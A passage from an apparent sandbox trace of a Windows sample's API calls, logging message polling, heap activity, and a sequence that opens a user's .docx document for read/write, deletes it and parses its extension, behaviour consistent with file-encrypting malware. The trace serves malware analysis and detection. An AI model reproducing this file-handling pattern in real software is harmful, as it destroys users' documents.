wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.995] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.995] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.995] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.995] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.995] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.995] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.995] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.996] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.996] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cigoy5u5b6axtcb.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0032.996] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.996] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.996] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.996] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.996] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.997] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.997] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.997] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.997] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.997] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.997] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.997] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.997] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.997] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.997] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.997] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.998] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.998] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.998] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx", lpFilePart=0x0) returned 0x3c [0032.998] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54bf33a0, ftCreationTime.dwHighDateTime=0x1d554dd, ftLastAccessTime.dwLowDateTime=0x87b8dd90, ftLastAccessTime.dwHighDateTime=0x1d57b4f, ftLastWriteTime.dwLowDateTime=0x138cbac0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1524d, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="CIgOY5U5b6Axtcb.docx", cAlternateFileName="CIGOY5~1.DOC")) returned 0x7c2100 [0032.998] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cigoy5u5b6axtcb.docx")) returned 1 [0033.000] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54bf33a0, ftCreationTime.dwHighDateTime=0x1d554dd, ftLastAccessTime.dwLowDateTime=0x87b8dd90, ftLastAccessTime.dwHighDateTime=0x1d57b4f, ftLastWriteTime.dwLowDateTime=0x138cbac0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1524d, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="CIgOY5U5b6Axtcb.docx", cAlternateFileName="CIGOY5~1.DOC")) returned 0 [0033.000] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.000] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0033.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.003] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.003] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af588 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.004] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.005] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.005] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 